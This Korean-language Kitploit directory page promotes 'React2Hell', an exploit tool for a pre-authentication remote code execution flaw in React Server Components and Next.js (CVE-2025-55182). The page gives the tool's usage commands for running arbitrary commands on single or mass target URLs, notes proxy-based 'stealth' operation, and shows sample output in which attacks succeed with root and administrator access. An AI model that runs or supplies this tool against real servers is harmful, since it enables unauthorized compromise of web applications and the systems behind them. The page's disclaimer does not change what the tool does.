Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Hell — [React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182 | Kitploit
도구/GitHubGitHub/aggressiveuser/react2hell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182

저장소 보기
38개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🧨 React2Hell — CVE-2025-55182 익스플로잇

🔥 Next.js / React Server 원격 코드 실행 (RCE) 익스플로잇

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 개요

React2Hell는 CVE-2025-55182를 테스트하고 익스플로잇하기 위해 설계된 강력한 익스플로잇 도구입니다. 이 취약점은 Next.js 및 React Server Actions에 영향을 미치는 중요한 원격 코드 실행 취약점입니다.

React Server Components 버전 19.0.0, 19.1.0, 19.1.1, 19.2.0 및 react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack 패키지에 인증 전 원격 코드 실행 취약점이 존재합니다. 취약한 코드는 Server Function 엔드포인트로 전송된 HTTP 요청의 페이로드를 안전하지 않게 역직렬화합니다.


✨ 기능

  • 🧨 원격 코드 실행 (RCE)
  • 🌐 단일 URL / 대량 URL 스캐닝
  • 🧩 사용자 정의 명령 실행
  • 🕵️‍♂️ 프록시 지원을 통한 은밀 모드
  • ⚡ 빠르고, 안정적이며, 사용하기 쉬움

📌 사용법

단일 대상 모드

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

다중 대상 (파일에서)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

HTTP 프록시 사용 (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

HTTPS 프록시 사용

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt 예시

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ 샘플 출력

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ 면책 조항

이 도구는 교육 및 보안 연구 목적으로만 제작되었습니다. 명시적 허가 없이 시스템에 사용하지 마십시오. 모든 행동에 대한 책임은 본인에게 있습니다.


⭐ 프로젝트 지원

이 익스플로잇이 도움이 되었다면 GitHub에서 ⭐를 남겨주세요 ❤️


👤 저자

Chetanya Sharma AggressiveUser

🔥 무언가를 부수고 고치는 것을 즐기는 사람이 만든 작품입니다.


도구 다운로드